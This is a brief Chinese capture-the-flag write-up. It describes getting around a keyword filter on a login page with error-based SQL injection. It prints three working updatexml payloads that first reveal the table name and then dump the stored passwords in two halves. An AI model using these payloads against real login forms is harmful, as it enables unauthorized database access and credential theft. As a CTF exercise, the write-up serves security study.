登入界面:
尝试关键字测试.
可以发现736的都被过滤了.
而且发现并没有具体的回显点.
于是尝试报错注入.
首先爆出表名.
admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
#H4rDsq1
然后:
admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))#
可惜只有一半.
在进行一次从右边开始的.
admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))#
拼接起来就是正确答案了.